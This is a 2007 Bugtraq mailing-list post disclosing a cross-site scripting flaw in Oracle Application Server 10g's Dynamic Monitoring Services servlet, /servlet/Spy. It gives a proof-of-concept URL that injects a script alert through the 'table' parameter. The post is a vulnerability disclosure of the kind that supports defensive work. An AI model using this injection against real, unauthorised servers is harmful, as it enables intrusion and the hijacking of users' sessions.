Oracle 10g Dynamic Monitoring Services XSS /servlet/Spy
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Oracle 10g Dynamic Monitoring Services XSS /servlet/Spy
- From: "Sea Shark" <sead3nx@xxxxxxxxx>
- Date: Tue, 20 Mar 2007 12:14:20 +0200
- Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=XbIqYH7H0sdHKb5fcicg/b2haxdMWP9ichBQvBfqNmlzCb4HDf1Ch1LLPpaLnOGYHnIGwhl49PxsZT15nArI6qws4KzkKJCK7xmi+rtGgUklmsMnYTBGPhto4mtKWAXmgKOGloJTBCbhU9uBXwfv/QSmfbUMhsqp6m8QGBF7U2U=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=X4/7eo9g4SULxC9sQe1odBZUuB8S0zrEl14je5kp8G5NrPFmQMrwRZONu05ucg+dSdCZmJE7dXSLib03d7/8MnHqYpmFc/4Xj6w/d/2AJ7km0XUytH8G3r3HRBVvpqiYx7TdWqG9M9TBjxmKmwlm/1DhnN7L8PLtOf4oSLuF5t0=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Hi,
Access to http://somesite/servlet/Spy should be restricted. But
generally database or system administrators ignore the hardening of
Oracle apllications or database. I have noticed XSS bug in Dynamic
Monitoring services on Oracle-Application-Server-10g/10.1.2.0.0.
http://somesite/servlet/Spy?format=metrictable&cache=false&interval=6400000&table=%3Cscript%3Ealert('inTellectPRO')%3C/script%3E&orderby=Name
d3nx